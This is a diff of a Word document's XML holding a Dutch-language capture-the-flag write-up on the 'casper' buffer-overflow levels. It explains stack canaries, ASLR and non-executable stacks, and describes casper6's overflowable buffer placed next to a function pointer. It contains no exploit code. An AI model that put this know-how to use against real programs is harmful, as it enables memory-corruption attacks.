+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een derde manier is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>y</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is een g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">eheim die geplaatst is op de stack en dewelke verandert </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">telkens </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">het programma uitgevoerd wordt. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Als de stack overschreven wordt gaat de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ook overschreven worden. Bij elke functie return gaat gekeken worden of de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aangepast werd, als dit het geval is stop het programma onmiddellijk.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een vierde mitigatie is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van ASLR, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Space </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Layout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Randomization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit maakt het moeilijker om het correcte adres te specifiëren van de shell code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc25519925"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Advanced level: Casper41</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit geavanceerde level heeft d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ezelfde structuur als casper4. Het enige verschil is dat de het gebruik maakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>clearEnvironment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie om de environment variabelen te verwijderen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dezelfde exploit als deze van casper4 kan gebruikt worden omdat deze oplossing niet gebruik maakt van environment variabelen.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Het bevat nog steeds dezelfde </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerabilities</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop1"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Deze aanval kan op v</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">erschillende manieren </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>worden</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>gemitigate</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>De implementatie van de c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ode kan aangepast worden door gebruik maakt van de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>strcpy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">functie met 3 parameters. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Deze extra parameter geeft het maximum aantal karakters dat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> gekopieerd kan worden naar de buffer. Specifiek in dit </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>programma</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is het maximum gelijk aan 999 karakters.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Een tweede manier is d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>oor gebruik te maken van een niet uitvoerbare stack. Hierdoor kan het returnadres nog steeds overschreven worden maar de code kan niet uitgevoerd worden</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in de stack</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Een derde manier is d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">oor gebruik te maken van stack </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canaries</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Deze </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canar</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>y</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is een g</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">eheim die geplaatst is op de stack en dewelke verandert </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">telkens </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">het programma uitgevoerd wordt. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Als de stack overschreven wordt gaat de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canary</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ook overschreven worden. Bij elke functie return gaat gekeken worden of de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canary</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> aangepast werd, als dit het geval is stop het programma onmiddellijk.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Een vierde mitigatie is d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">oor gebruik te maken van ASLR, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Address</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Space </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Layout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Randomization</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Dit maakt het moeilijker om het correcte adres te specifiëren van de shell code.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop2"/>
-        <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc25519925"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Advanced level: Casper41</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Dit geavanceerde level heeft d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>ezelfde structuur als casper4. Het enige verschil is dat de het gebruik maakt van de “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>clearEnvironment</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>” functie om de environment variabelen te verwijderen.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Dezelfde exploit als deze van casper4 kan gebruikt worden omdat deze oplossing niet gebruik maakt van environment variabelen.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Het bevat nog steeds dezelfde </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vulnerabilities</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop1"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc25519926"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc25519926"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper</w:t>
@@ -3220,135 +3238,1125 @@
         </w:rPr>
         <w:t>6</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc25519927"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Omschrijving</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="8"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Het programma in c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>asper6 is gelijkaardig aan casper4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het verschil is het gebruik van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">De </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> slaagt een buffer van 999 karakters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> op</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gevolgd met een functie pointer die als input parameter een pointer naar karakters aanvaard.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Deze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> wordt opgeslagen in het datasegment van de memory.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> De “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie gaat in dit programma enkel “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Hello</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” printen gevolgd door de karakters dewelke voorzien worden als argument </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>van</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de functie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Bij de start va</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n het programma gaat de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>somedata.fp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> functie pointer </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gïnitialiseerd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> worden met het adres van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” functie. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Vervolgens wordt er nagekeken of er een parameter meegegeven wordt, net zoals in casper4.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Hierna wordt de input gekopieerd naar de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>somedata.buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variabele. Dewelke, tot slot, gebruikt wordt bij het aanroepen van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>som</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>data.fp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> func</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>tie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Wat opvalt zijn de variabelen in de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en het onveilig </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>kopiëren</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> met behulp van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
